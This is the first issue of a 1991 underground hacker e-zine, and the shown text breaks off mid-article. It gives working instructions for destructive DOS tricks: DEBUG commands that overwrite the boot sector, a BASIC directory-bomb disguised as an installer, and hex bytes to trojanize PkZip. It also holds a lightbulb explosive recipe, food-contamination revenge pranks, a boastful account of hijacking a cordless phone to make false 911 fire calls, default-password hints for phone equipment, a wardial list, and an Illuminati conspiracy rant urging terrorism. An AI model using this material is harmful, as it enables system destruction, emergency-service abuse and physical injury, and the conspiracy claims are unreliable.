💾 Archived View for gemini.spam.works › mirrors › textfiles › magazines › DIGITALMURDER › dm001.txt captured on 2022-06-12 at 11:31:20.

View Raw

More Information

-=-=-=-=-=-=-






       ///  / ///  / /////  //  /       //    // // // ///   ///  ////  ///
      /  / / /__  /   /   /  / /       ///  /// // // /  /  /  / /     /  /
     /  / / /  / /   /   //// /       // // // // // ///   /  / /''   ///
    ///  / //// /   /   /  / /////   //    // ///// //  \ ///  ///// //  \


              A Magazine for Cyberpunks and Other Hi-Tech Low-Lifes


               Issue No. 01                         October '91
                           A Danger Kult Production.

















          -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

            These filez are for educational and informational studies
            only.  The writers for Digital Murder will not be responsible
            for any use or misuse of information published in this
            disk-based magazine.  The magazine and its contents are
            free to the public and may be freely distributed in any
            form as long as Digital Murder magazine and the author
            is given credit.

          -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


                              Information is Power.




















    Greetings and welcome to the first         ///  / ///  / /////  //  /
    issue of Digtal Murder.  This pro-        /  / / /    /   /   /  / /
    ject has taken too long but I hope       /  / / / '/ /   /   //// /
    future issues come out on time and      ///  / //// /   /   /  / /////
    more people get involved.  If  you
    are interested in sending articles    //    // // // ///   ///  ////  ///
    to us then call one of our support   ///  /// // // /  /  /  / /     /  /
    boards or write us at our P.O.Box.  // // // // // ///   /  / /''   ///
    We have many other projects in the //    // ///// //  \ ///  ///// //  \
    works as well as  making  improve-
    ments to the 'zine as we go along.              P.O. Box 280363
    This is the 80 column  version  of                Memphis, TN
    Digital Murder.  We also have a 40                   38168
    column version of each issue.

    We hope to have a letters  section          Editor:  Morpheus
    in this zine so drop us a line  in
    our P.O. Box.  Hate mail, articles         Writers:  Morpheus
    for the 'zine, ads for boards  and                   Blackened
    other 'zines, questions, comments,                   Technysis
    etc. . are all welcome.                              Neuron God
                                                         Placebo Effect
                                                         Digital Terrorist
                                                         Zapped

                                         Support:  Backdoor--901.386.6455















     -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                           I N   T H I S   I S S U E
    Page#                -=-=-=-=-=-=-=-=-=-=-=-=-=-=-

      3   From the Mouth of Blackened-- Editorial from veteran Phreak.
      4   Secret Societies in Govt.  -- Placebo Effect exploits all.
      6   Fnords                     -- Subliminal control by Binky.
      7   Anarchy For Sale           -- Digital Murder's Anarchy Cookbook.
      8   Phun with Frozen Shit      -- literally...by Neuron God.
      9   Lineage 2000 RAS Tech Info.-- A look at Voltage monitoring sys.
     11   Phun with 911              -- Technysis and Blackened's adventures.
     13   Scan of the Month Club     -- A few things to keep you busy.
     15   There's a Virus in my Soup -- Techniques by Digital Terrorist.
     17   Phone Company Hate Mail    -- Letter of humorous interest.
     19   Heaven's Trash             -- Final Words from Morpheus.
     -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-








                                                                        3



         From the Mouth of Blackened
        -=-=-=-=-=-=-=-=-=-=-=-=-=-=-


         Well, I have some shit to say.  First off, fuck Wild Cat, the dude
         who turned me in to the Secret Service.  Next, just because I have
         not been seen on the Backdoor doesn't mean I am not  the  official
         SysOp still.  Technysis can't be God forever. . . Hahaha.  Onward.

         I started off in late '84 as a young punk ass but soon  progressed
         to higher knowledge of phreaking.  I then escalated  my  knowledge
         even further.  I have dropped out of the scene more and more  this
         past year or so but you know how it is. . . real life  comes  into
         play at some point.  I realize that all this undergroud mayhem  is
         truly nessecery for the advancement of our social/security  system
         as a whole.  It's cool to hack a military defense system which  me
         and Morpheus have done on occasion BUT you don't want some asshole
         behind the keys trying to kill us all so it all works out  evenly.
         Some people get busted, the security of a  system  is  spruced  up
         and the new generation of hackers is born.  The system is cracked,
         more people get busted.  It goes on and on.  With  out  crackdowns
         and system pipe-ups we would all have equal knowledge and then  no
         one would learn from each other.  That would be just plain boring.
         Shit, punks might start doing homework at night again  instead  of
         infultrating systems for the cause:  The cause for the freedom  of
         information attainment and exchange.  INFORMATION IS POWER.

         Well enuff of my philosophy...which no one probably understands.
         I'm out of here for now but remember. . .
                   Pussy is cool, but when its dead, its cold.

                                            BLACKENED






         -----------------------------------------------------------------


         Hmmm... well we have what... a fuckin' half page or so left.

         Fuck it.  I'm tired.  Just read my other  articles  in  this

         Issue of Digital Murder.  Look at the  rest  of  this  empty

         page.  Stare at it.  Feel the power of negative space.

         How low can you go?

         -----------------------------------------------------------------










                                                                        4


     ********************************************
     *Secret Societies and the Secret Government*
     ********************************************
     A text-file by Placebo Effect (DK, InFOWORD)




     Today's world is a difficult world, as we can all relate to.  We live
     in a country that was based on some really good ideas, but has since
     moved in the opposite direction from freedom to oppression and
     dictatorship.  Our elected officials are not representing us, the
     people, but the big businesses, corporations, anyone with enough
     money to contribute to their own pockets.  We live in a nation where
     double standards are a way of life, where the budget needs to be
     balanced and the deficit is huge, and where on top of all these
     problems, Congress can give themselves a raise for causing all this
     shit to happen.  This article is to open awareness to these problems
     and how they affect YOU, the person, the CITIZEN of the United
     Socialist Republic of Amerika.

     As information is suppressed and the truth denied, it is hard to
     believe what others say.  The lies are said to be truths, truths to
     be lies, and coverups to be a great way to get laid.  Please believe
     the contents of this file, as they are TRUE, in the eyes of any
     openminded nonsheep human.

     We, the Goyim (human cattle) live for the whims of a few.  Many of the
     people in the resistance call these few the ILLUMINATI.  These people
     DO exist, and are destroying the world to this day, preparing it for
     total domination by the rich and powerful.  The government denies all
     existance of this Super-ELITE group, because the ILLUMINATI controls
     all the governments of the world to some extent.  Massive coverups,
     lies, distorted truths, murder, are all the tools of the Illuminati.
     Never be fooled by the halftruth telling lying mother fuckers of
     Congress.

     The story goes back centuries ago, but I will start a mere century and
     a half ago, in 1840.  In 1840, General Albert Pike came under
     influence of other One Worlders (people for one world government) and
     decided to build a military blueprint that calls for 3 world wars and
     3 major revolutions.  He did most of his work in a 13 room mansion in
     Little Rock, Arkansas.  When the Illuminati, and the lodges of the
     Grand Orient became suspect, Pike organized The New and Reformed
     Palladian Rite.  He established three supreme councils; one in
     Charleston, S.C., another in Rome, Italy and another in Berlin,
     Germany.  He had another one worlder, Mazzini, establish 23
     subordinate councils in strategic locations throughout the world,
     which have been the secret headquarters of the world revolutionary
     movement ever since.  These councils secret controlled inconspicuous
     "incidents" that took place all over the world that would lead to the
     spark of war.

     Pike's plan required that Communism, Naziism, Political Zionism, and
     other International movements be organized and used to foment the
     three global wars and three major revolutions.  The First World War
     was to be fought so as to enable the Illuminai to overthrow the
     powers of the Tzars in Russia and turn that country into the
     stronghold of Atheistic-Communism.  The differences stirred up by
     agentur of the Illuminati between the British and German Empires were
     to be used to foment this war.  After the war ended, Communism was to
     be built up and used to destroy other governments.

                                                                        5




     World War Two was to be fomented by using the differences between
     Fascists and Political Zionists.  This war was to be fought so that
     Naziism would be destroyed and the power of Political Zionism
     increased so that the sovereign state of Israil could be established
     in Palestine.  during World War Two, International Communism was to be
     built up until it equalled in strength that of united Christendom.
     At this point it was to be contained and kept in check until required
     for the final social cataclysm.

     World War Three is to be fomented by using the differences the agentur
     of the Illuminati stir up between Political Zionists and the leaders
     of the Moslem world.  The war is to be directed in such a manner that
     Islam (the Arab World including Mohammedanism) and Political Zionism
     (including the State of Israel) will destroy themselves while at the
     same time the remaining nations, once more divided against each other
     on this issue, will be forced to fight themselves into a state of
     complete exhaustion physically, mentally, spiritually and
     economically.

     Pike, on August 15, 1871, told Mazzini that after World War Three is
     ended, those who aspire to undisputed world domination will provoke
     the greatest social cataclysm the world has ever known.  Quoting a
     letter (taken from a letter catalogued in the British Museum Library,
     London, England):

       "We shall unleash the Nihilists and Atheists, and we shall provoke a
        formidable social cataclysm which in all its horror will show clearly
        to the nations the effect of absolute atheism, origin of savagery and
        of the most bloody turmoil.  Then everywhere, the citizens, obliged
        to defend themselves against the world minority of revolutionaries,
        will exterminate those destroyers of civilization, and the multitude,
        disillusioned with Christianity, whose deistic spirits will be from
        that moment without compass (direction), anxious for an ideal, but
        without knowing where to render its adoration, will receive the true
        light through the universal manifestation of the pure doctrine of
        Lucifer, brought finally out in the public view, a manifestation
        which will result from the general reactionary movement which will
        follow the destruction of Christianity and atheism, both conquered
        and exterminated at the same time."

     People, we are sheep being led to slaughter.  Our brothers are dying
     in foreign wars created by these powermonger assholes we call Big
     Business.  We must fight this evil with all our heart and dedication.
     Terrorism against big business, against government.  VOTE for
     competent people who can think with their heads, not with their
     pocketbook.  Get the crooks out of Congress, Senate, White House and
     maybe we can salvage whats left of this shitty nation.

     I hope you read this file with earnest and learned that YOU are just a
     Pawn.  Expendable.  But it doesn't have to be that way.











                                                                        6

              ----------------------------------------------------
                                  F N O R D S !
                                --=-=-=-=-=-=-=--

        This article was found late one nite on the Digital Murder article
   submissions UD area.  The beginning was screwed up a little but I  left
   all I could salvage in order to give proper credit to  the  author  and
   others responsible for its publication.  The article is great so read!!
   Thanks to whoever uploaded it to the Backdoor and, last but not  least,
   THE WRITER, Binky, who deserves proper credit.   -Morpheus/Editor.


   By: Binky                                                         - RoR -
   -------------------------------------------------------------------------
   Shawn-Da-Lay Boy Productions, Inc.
   -------------------------------------------------------------------------
   ---The HQ of SDBP, inc - 415.236.2371--The Electric Pub - 415.236.4380---
   -Primary Drop Sites-----Rat Head - 415.524.3649-----Primary Drop Sites---
   -------------------------------------------------------------------------


        A Fnord is a word that you have, unknowingly since  the  start  of
   your ''education'', been conditioned to associate with fear and unease.
   You have also been conditioned not to notice that they are there.   The
   institution of ''Fnord conditioning'' in American elementary  education
   was first done in the fifties.  Why do this?  Well, if a government  or
   other large organization wants to have some immediate control of  large
   crowds, they must use preconditioned reflexes.  Fear and general unease
   are always good emotions to evoke when seeking  control.   The  use  of
   Fnords in news casting  can  be  used  to  create  either  a  sense  of
   revultion towards specific people or things (creating bias without your
   knowing why) or, applied differently, a sense of urgency and importance
   towards the issues focused upon.

        The use, or specific lack of use, of Fnords in advertising is  the
   reason that the American public only feels happy when they're consuming.
   It works something like this:  Everyday the people are  bombarded  with
   thousands of Fnords - in newspapers, newscasts, television shows, radio
   programs, lectures, texbooks, novels, etc.  Therefore,  as  Fnords  are
   creating unease at every turn, a lack of Fnords causes  great  relief -
   much like taking off a heavy pack after hiking all day.  The  folks  at
   Madison Avenue realize this all too well, and use it to their  benefit.
   By including absolutely no Fnords in their advertisements they create a
   sense of well being that always occurs , quite  inexplicably,  whenever
   their product is advertised.  After a while people begin  to  associate
   well being with that product subconsciously.   Then, next time they are
   shopping, their subconscious urges them to buy that which relieves  the
   unease, and they buy the advertised product.

   Sneaky, but very effective.  Watch for them.


   Call these other fine boards.....
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
   -= The Legion Outpost...................................415/521/7413 =-
   -= The Crystal Ship.....................................415/524/9951 =-
   -= The Village..........................................415/237/4145 =-
   -= Pro Leech............................................415/236/8192 =-
   -= The Nimitz Downport..................................415/276/3677 =-
   -= Lunatic Labs.........................................213/655/0691 =-
   -= Bad Dudes Hideout....................................415/391/0704 =-
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=- RoR - Alucard -=-=-=-=-=-=-=-=-=-=-=-=-=-


                                                                        7



                  - = A N A R C H Y   F O R   S A L E = -


     Bulb Bomb  - Neuron God.
    -=-=-=-=-=-

     Try this.  Put some alcohol (Isopropyl or Denatured-- Isopropyl is
     what's been tested by me..  Denatured is just plain  dangerous and
     flammable as hell...  something like 600 proof) on  a  fair  sized
     piece of steel wool.  Use quadruple-zero grade (the really powdery
     steel wool) for best effects.  Now, after you've soaked the  steel
     wool in the alcohol for a while (long enough to  get  it  to  hold
     some of the stuff) wrap it around a burned-out lightbulb.  Do  not
     use one if it is already cracked or has a hole in it anywhere.

     Next, twist the steel wool together so that it stays  without  you
     having to hold it.  Now bend a coathanger so  that  it  holds  the
     screw end of the lightbulb LOOSELY (loose enough so  that  you can
     sling the lightbulb into the air).  See what I'm getting at?  heh-
     heh-heh.  Now place the lightbulb in the launcher and light up the
     steel wool.  The alcohol will burn just hot enough to  catch  some
     of the steel wool on fire.  As the closed lightbulb gets  hot, the
     gases inside expand.  If you put the steel wool too far down  then
     the only thing that will happen is  the  lightbulb  will  separate
     from the base.  The wool should go around the fattest part  of the
     bulb.  Soft-whites work best because they are squared off.

     When the gases inside expand enough... BOOM!!  You should let  the
     alcohol burn for a couple of seconds before you launch the sucker.
     If not it will hit the ground before it explodes.  This  will  not
     work every time.  By the way they're made, lightbulbs come out all
     different thicknesses, with all different amounts of  gas  inside,
     different mixtures of gas, etc.  Experiment and find your favorite
     kind of bulb for this.  The timing will  depend  heavily  on  what
     kind of bulb you use so experiment here as well.

     USE SAFETY GOGGLES!!!  Your eyes will be damaged beyond all repair
     if this sucker goes wrong.  Although we are not responsible if you
     are careless and get hurt, we still stress SAFETY in your anachist
     ventures.  Be careful and alwayz smile while you destroy.


     Condensing Coke
    -=-=-=-=-=-=-=-=-

     This should let you use a regular soft drink (like Coke) to make a
     strong acid.  Stretch a balloon over the top of a Coke can (before
     you open it).  CAREFULLY open the can so that the CO2  coming  out
     of it is captured in the balloon.  Let the coke sit until  all  of
     the CO2 is out of the Coke and in the balloon.  It's a  good  idea
     to stretch the balloon out first, and fasten it tightly around the
     rim.

     Now, if you get enough CO2 in the balloon, you should be  able  to
     close off the end and have an inflated balloon, full of CO2.   Now
     all you have to do is get a SMALL amount of water and add the  CO2
     into it.  The most common method of doing this is by  putting  the
     balloon over a container of some kind and applying pressure to the
     balloon to force the CO2 into the cup.  For the CO2 to dissolve in
     the water, the water must be kept cool, so surround the  cup  with


                                                                        8


     ice.  Now, depending on how well you  captured  the  CO2  and  the
     mineral content of your tap water, you should have  Carbonic Acid,
     which is a strong acid.  There are other more assured  methods  of
     producing CO2 (baking soda and vinegar) but with this  method  you
     have the CO2 prepackaged.

     Try forcing CO2 into the water using chem lab glassware if you can
     find it.  To do that you should set it up so that the CO2 produces
     bubbles in the water.  Keep producing more and  more  CO2  until a
     piece of Magnesium will react with your acid.  Always remember  to
     keep the water cool otherwise the gas won't dissolve into  it very
     well.



         +-----------------------------------------------------------+
     ****               Phun with frozen shit (literally...)          ****
     ****               by: Neuron God             (9.14.91)          ****
     ****                      InFOWOrd/Danger Kult                   ****
         +-----------------------------------------------------------+


     There are times when everyone feels like getting revenge on someone
     or just plain hates some dumbass who never seems to go away.  These
     people can be dealt with easily at only a small sacrifice  by  you.

     First, find some fresh animal shit (the fresher the better) and put
     it in your freezer until it's frozen solid.   That's the sacrifice.
     Now, when you decide among the following options,  you  can  choose
     your time and how many times you do  the  deed  according  to  your
     stockpile of shit.

     Warm & Wonderful:  Most shit smells worst when extremely hot.  Just
     put some into the victim's microwave oven or regular oven when  you
     know they won't be looking around the kitchen for a while. Go crazy
     with the settings.  For a microwave, try 99 mins  99 secs  and  see
     what happens.  You may have to adjust the time since some microwave
     won't take that much time.  Set it to the highest power.    Do  the
     same with the regular oven.  Since freezing things brings  all  the
     water in them to the surface, the thawing process should  produce a
     nice sludge-type remnant of what you put in there.   After  it   is
     thawed, the remaining material will start to cook and burn.     Not
     good for the victim.  The house/apartment  will  smell  like  burnt
     shit and they'll probably never clean their oven out.

     Up Yours:  Once again, warmth is the key.  Most people's cars run a
     little hot and so their exhaust is a good source of heat.      Just
     shove a wad of frozen shit in the tailpipe- way up there - and  let
     them do the rest.  You could also pop the hood  and  just  lay  the
     stuff on top of their engine... preferably next to the air vent....

     Don't ask what's in it:  Break the frozen shit up into small pieces
     and sprinkle it over some of their frozen foods.  Since it'll  stay
     in the freezer until they take it out, it'll probably go unnoticed.
     Then, when they take the food out to thaw, everything  you  treated
     will smell VERY unedible.







                                                                        9



     Cubed:  The old trick with the fly stuck in  the  plastic  ice-cube
     comes to mind.. empty a tray of ice from their freezer and place  a
     couple of small pieces in the tray.  Then put water in it and place
     it on the  bottom of the ice tray stack.  By now most  people  have
     ice machines, so be creative with this one.

     In large amounts, frozen shit will create large pools of sludge when
     it is thawed since the water dissolves some of the minerals  in  it.
     This sludge is not something that one would be happy to see on their
     windows.  Try slopping it on the ground somewhere  that  the  victim
     often goes barefoot or even in their bathtub. Molded correctly, shit
     can look like a hamburger just as well as ground beef.  Just stick a
     shit burger on the grill while the victim is having his next cookout
     and watch the fun.





                    (((((((((((((((((((())))))))))))))))))))

                                 LINEAGE 2000 RAS
                          General and Technical Outline
                                       by
                                    Morpheus

                    (((((((((((((((((((())))))))))))))))))))

     Lineage 2000 Remote Access System (RAS) is used by Ma Bell to
     monitor all types of power equipment they use.  Lineage 2000
     has 16 analog and 16 binary input channels which are used for
     the system's monitoring purposes.  Each analog input channel
     can measure ac and dc voltage from 10mV to 150V with accuracy
     of 0.1% of full-scale for dc measurements and 0.7% for ac.
     The binary input channels sense the presence or absence of
     voltage in ac or dc circuits from 20V to 150V.  These are mainly
     used for monitoring alarms, relay coils or contacts, and sensing
     blown fuses.  In addition, spare unused contacts can be monitored.

     Alarm Output info
    -=-=-=-=-=-=-=-=-=-
     The three alarm outputs are major alarm, minor alarm, and fault
     (aka watchdog) alarm.  These alarms are provided as form-C contacts.
     The major or minor alarm can be activated when any analog channel
     goes outside a user specified window or when any binary channel
     switches to an abnormal state.  The user decides whether any channel
     can trigger an alarm.  The user also decides which alarm to trigger.

     The watchdog alarm is a fault alarm indicating an internal fault, or
     improper software execution.  Upon experiencing a watchdog, The RAS
     actuates its watchdog alarm contacts (ie. it activates a light on the
     front panel) and tries to reset itself.

     Comm. Ports
    -=-=-=-=-=-=-
     Lineage 2000 has two standard RS-232 ports.  Port 1 is used w/ a
     modem for dialup access (!).  Port 2 is used to daisy chain two or
     more RAS together (more on this later).  It can handle up to 8 other
     RAS units on a chain.



                                                                       10



     System Control
    -=-=-=-=-=-=-=-=-
     The heart of the RAS is a microprocessor in each unit that collects
     and processes data.  Each configured analog input channel is sampled
     approx. every 15 seconds.  Each measurement is compared to the alarm
     limits for that channel and used to update the internally stored
     stats.  If an alarm exists, the specified alarm relay is on until the
     situation is corrected.  The binary alarms are sampled several times
     per second and the alarms work the same of the analog alarms.

     Security Features
    -=-=-=-=-=-=-=-=-=-
     Each system has a two level login.  The first login allows you
     access to the system with read access.  After first level login
     is complete, the second level can then be accessed giving the user
     read/write access.  Write level access allows you to change alarm
     limits, start trend studies, configure login screens, etc.  A quick
     reminder:  most systems still use the default passwords set up by
     the manufacturer and are relatively synonymous to the product name.
     (^HINT-HINT^)  The first level login is 1 * and 2nd level is **.
     Initial level one entrance is prompted by your standard ''Enter
     Password:''.  Enter 2nd level by typing login at * and then entering
     level two pw.

     RAS Configuration:
                         Login <> 1per system up to 70 chars.
                    Unit Desc. <> 1per unit up to 70 chars.
                 Channel Desc. <> 1per channel up to 30 chars.
                  Alarm Limits <> fully programmable
                 Scale Factors <> scale for voltage/non-voltage printouts
                 Channel Units <> Specifies voltage (V,KV,etc..)2chars max

     Statistics on other remote functions:

                 Active Alarms <> All current alarms
                 Alarm History <> 10 most recently retired alarms and
                                  3 most recently retired per channel.
               Analog Channels <> 3 max vals/3 min vals/3 max hourly avgs.
                   Trend Study <> Can be initiated for any one channel for
                                  up to 10 days.

     For those that plan to pick one up...
     Front Panel:  Black Spattered Paint (Metal)
         Chassis:  White Smoothed Paint (Metal)
            Size:  17''W x 12''H x 5''D
          Weight:  10lbs.
















                                                                       11



          -/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
                   -/-P H U N   W I T H   9 1 1-/-
          -/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
                   Written by:  Technysis (9.28.91)

        Well, 911 is a system that can easily be exploited for fun
        in a few simple ways.  These will be presented to  you  in
        this file in hopes of you learning a few things.

        DISCLAIMER: I am in no way responsible for the use
        of the information presented whithin this file. It
        is here for information purposes and  hypothetical
        situations (wow what a big word).

        Now that all the bullshit is out of the way let's get down
        to business.  I can guess what some of you are asking. . .
        How can we use 911 for fun?  Well, pranking it is not  fun
        in itself but how you actually do it.  I'm going  to  talk
        about one way to do it and tell a little story  about  the
        lamer way.  Ok, let's get going.

        The best way to 'get down' with 911 is through a  cordless
        telephone.  If you have an average I.Q., you'll know  that
        there are only 10 cordless frequencies around.  There  are
        10 for the handset and  10  for  the  base.  We  are  just
        concerned about the base.  Ok-a friend of mine, Blackened,
        found this out in a strange way. He took his phone handset
        out and was talking to someone then he got a revolutionary
        idea.  Maybe he could pick up someone else's base  conver-
        sation.  I went to his house and we  went  driving  around
        all over where he lives.  He had the antenna out  the  car
        window with it on listening for other people's  dialtones.

        Shure enuff, it happened.  We found one, and what luck  we
        had.  It was only several blocks from  a  fire station.  I
        parked out at the curb where the most likely spot the base
        was located at, and he had the  idea  to  call  911.  When
        they answered, it went something like this:

               911: 911, Fire, Ambulance, Police?

               BLA: Help! The heater fell over in my
                    room and caught the rug on fire!
                    It's spreading.

               911: Hold on sir, the firemen are  on
                    their way.

               BLA: Click....

                         --- ANI REDAIL ---

               911: Sir, are you there?

               BLA: Hurry, ahhh, shit, help....

               911: Sir, Mr. Stevens...

               BLA: Click....



                                                                       12



        We could hear the fire truck on the way, so we  drove  off
        and watched from a remote observation  point.  Notice  how
        911 called back.  Since your I.Q. is pretty high, you knew
        that they would call back.  If we had left before  911 had
        a chance to call back, they would not have called the fire
        station immediately, but would've waited for  verification
        of the call.  So, you guessed it, we waited for the  call,
        and bullshitted and hung up.

        We did this several times  to  the  same  house.   It  was
        actually pretty funny to see the look on  the  homeowner's
        face when she was confronted by 5-6 firemen ready  to  put
        out a fire.  This is basically the story and the way to do
        it, but if you did not find this informative then fuck you.

        Another way, the lamer way, is to just go up to a payphone
        and dial it.  There is actually no fun  in  this,  but  it
        does the main thing.  It pisses off the 911  operators and
        distracts them from their  job.  911  is  a  service  with
        several security loop holes  left  to  be  exploited.  For
        example, not being able to trace through  a  PBX.  Usually
        that isn't possible to start with, but for the  phone  Co.
        itself, it can be done.  Why they don't?  Who  knows,  but
        that is a whole different story all together.

        Well, that brings this artice to a close  but  stay  tuned
        for more.  As you have seen, my articles are not  so  much
        geared toword the technical side but  to  application  and
        side-effects (fun) of the particular topic. I have several
        more lined up and if you want them, Digital Murder is  the
        place.

        Thanks go out to:  Blackened, for the idea  and  the  good
        times that 911 has given us.  Morpheus, editor-in chief of
        Digital Murder, for a good 'zine to put this article in.

        Call the home of Digital Murder: Backdoor/ X-Factor Whq
                                         1200/2400 24hrz a  day
                                         Demo/Text file support
                                         901-386-6455
                                         -Elites only.





















                                                                       13



                     -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                      Digital Murder Scan 'o' de Month!
                     -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

              This month's scan of the month is by Zapped.  He is planning
          on doing this section for every issue which is a good idea since
          he does a thorough job of reporting what he finds.  I'm sure all
          of you will find something of interest within the numbers of our
          scan of the month.  Enjoy,   ...Morpheus.

     Prefix owned by:  AT&T

     Dialtones(PBX-etc..)
     --------------------
     800-336-0163
     800-336-0263  (dead PBX)
     800-336-1156
     800-336-9883  (wait a few rings...)

     Carriers
     --------
     800-336-0130
     800-336-0176  (Military system)
     800-336-0188  (Western Union Priority Mail Service-Acct. Id# prompt)
     800-336-0189  (  ''     ''      ''     ''     ''    ''    ''   ''  )
     800-336-0338
     800-336-0367  (UNIX??)
     800-336-0543  ( ''       ''       ''       ''   )
     800-336-0643  (UNIX w/ Xenix terminal server)
     800-336-0737  (Military system)
     800-336-0811
     800-336-1167  (Comdisco Computer Resource Center)
     800-336-5409  (DeRoyal Industries VAX)

     VMB systems
     -----------
     800-336-0017  (Techmatic Message Center)
     800-336-0205  (GTE South's VMS)
     800-336-0276  (answering machine)
     800-336-0286  (Business Travel News-- hit # to enter VMS)
     800-336-1086
     800-336-1227  (Phoenix VMS--3 digit boxes)
     800-336-3001  (After business hrs. VMS)
     800-336-6000  (Audix VMS)
     800-336-9001  (Data General Digital Help Line & VMS)
     800-336-9004  (The Phone-Mail System)
     800-336-9050
     800-336-9161  (Ramada Inn at 6 flags--Not a VMS--ext#987 =front desk)
     800-336-9869  (Xerox Message Exchange)
     800-336-9916  (Security Pacific Bank Card VMS--4 digit boxes)
     800-336-9923  (Infrence Corp. VMS)











                                                                       14



     Misc. Digits
     ------------
     800-336-0441  (AlexPhone--Enter Soc. Sec. #--VMS?)
     800-336-0540  (FAX)
     800-336-0814  (FAX)
     800-336-0892  (FAX)
     800-336-0968  (someone's beeper..)
     800-336-0997  (FAX)
     800-336-1049  (FAX)
     800-336-1061  (FAX)
     800-336-1112  (FAX)
     800-336-1119  (wierd beeping)
     800-336-1151  (enter id)
     800-336-1152  (enter id)
     800-336-1153  (enter id)
     800-336-1154  (enter id)
     800-336-1156  (enter id)
     800-336-1178  (FAX)
     800-336-1188  (FAX)
     800-336-1208  (FAX)
     800-336-1398  (FAX)
     800-336-1452  (wierd beeping)
     800-336-1422  (FAX)
     800-336-5002  (FAX)
     800-336-9014  (FAX)
     800-336-9017  (FAX)
     800-336-9055  (wierd pulse)
     800-336-9073  (FAX)
     800-336-9840  (FAX+wierd beeping)
     800-336-9846  (FAX)
     800-336-9847  (FAX)
     800-336-9856  (FAX)
     800-336-9872  (FAX)
     800-336-9890  (enter id)




























                                                                       15



                         -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                         5 Ways To Trash An Enemy's System
                         -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                            by:  Digital Terrorist

     Well, we all certainly have those little friends who we don't like, don't
we?  Wouldn't be nice to just trash his system and be done with him?  This will
help.

1.  If you are ever in a store that has demo computers and are bored, or, the
more likely approach- are at your enemy's computer (BBS or whatever), here is a
neat little trick you can do.  Get to DOS (depends on program they are
running.. Some are already in DOS.  Then type in the following ..
   DEBUG
   A
   MOV AX,0201
   MOV BX,0200
   MOV CX,01
   MOV DX,80
   INT 13
   INT 20
   <ENTER>
   G
   E 200
   CD 19
   A 100
   MOV AX,0301
   <ENTER>
   G
   Q

And then reboot.  The hard drive light will be on, and it will sit there..
Took down a couple of stores in a local mall at 5 minutes a store, but i type
fast, so don't expect it to go that fast.  The clerks won't know what the
hell you are doing, because they don't know shit about computes.  (Fenris Wolf)

2.  Compile this BASIC program on your computer, and send it to your "friend".
Great for those that run bbs's.  Be sure to include some ANSI drawing crap and
some docs on what it does and how to use it.  Also, include in the docs that it
can take a lot of time to run (the more time this thing gets, the more damage
it does, muhahaha!).  What it does is make tons of directories with high ascii
characters, and makes them EXTREMELY tough to delete.  Have fun with this one!

print "Disk Speed v1.2 lpha"
print "Installation program"
print:print "This could take up to 30 minutes.  Please wait"
print:print "Working";
again:
chdir "\"
for z=1 to 7
for i=1 to 8
j$(i)=chr$(int(rnd(1)*127+1)+128)
next
k$=j$(1)+j$(2)+j$(3)+j$(4)+j$(5)+j$(6)+j$(7)+j$(8)
mkdir k$
chdir k$
print ".";
next
goto again


3.  This is pretty cheap, but it works, AND it's great for doing damage quickly.
                                                                       16



Use the Norton Utilites (or PC Tools Deluxe or Mace or whatever) and have some
fun with the boot sector, file allocation tables, and root directory sectors!
Now, reboot.  Explain to your "friend" that a gigantic spark leaped through the
powerline into his computer and that's why his system is like that.  For even
more speed, use the Norton Utilites "sector copying" feature to overwrite the
first 200 sectors of his hard drive (this way, you will be sure you won't miss
much).  It's fast AND efficient...


4.  Take a magnet up to your friend's floppy disks and then erase his IBMBIO.COM
and IBMDOS.COM files (or MSDOS.SYS and IO.SYS) and his COMMAND.COM file.  Make
sure you have totally destroyed anything that will allow him to bootup.  Note,
this is a very shotty method, and not recommended.


5.  Call up your favorite virus board and download EVERY single virus you can
find.  If you are good at programming assembly, consider using synonymous
instructions in the viruses so they are hard to detect (that is, if this
favorite person uses a virus scanner).  Now, take the EXE's (or COM's) out of
the compressed file.  Make a batch file that runs all of the files.  Then,
make it into trojan horse form (add docs, ANSI crap, etc.), and name batch
file that runs all executable files, INSTALL.BAT.  When he runs INSTALL.BAT, or
any of the EXE files, he'll have tons of viruses in his system, which, if you
picked right, are very hard to remove.  This one is a great trick to play on
someone.


Five Minute Trojan
-=-=-=-=-=-=-=-=-=

Need a trojan horse real quick?  Install the following bytes before every
B4 4C CD 21 (all this is hexadecimal- use Norton Utilites) in a popular program
such as PkZip, then change the text that says "version 1.10" (in PkZip's case)
to "version 2.00".  Obtain all PkZip docs from the original PKZ110.EXE file,
and only change parts of the documentation.  Add stuff like "PkZip v2.00 is
90% faster, written in pure assembly language, and achieves 33% better
compression."  You get the picture.  Make it a good looking trojan.   Also,
be sure to include near the front of the docs, in all caps, "DISABLE DISK
CACHES WHEN USING!!!".  This is absolutely necessary and cannot be ommitted.

Ok, here are the bytes.  They must be inserted (this is a pain, but use a text
editor, find all occurances of ascii bytes 4LM! and insert before them this:
"0123456789876543".  Now, go into Norton Utilites, search for all occurrances of
 ^^^^^^^^^^^^^^^^ text phrase.  Replace these with the hexadecimal bytes:

B4 03 B0 C8 B5 00 B1 01 B6 00 B2 00 CD 13

Now, it's ready to go.  Working correctly, this will wipe out their boot sector
and some other sectors IF

a) they don't have a disk cache installed
b) they don't have a program that intercepts direct disk writes

Now, have fun, and don't hurt anyone (muhahaha).








                                                                       17



     The End of the Phone Network....
    ----------------------------------
     Written by: Technysis

          This file was written over at a friends house one day
     while he was on the phone.  I had just taken a stereo installer
     test, on his IBM, and found out that I didn't know as much as I
     had thought.  So due to that fact, and the fact he was not in good
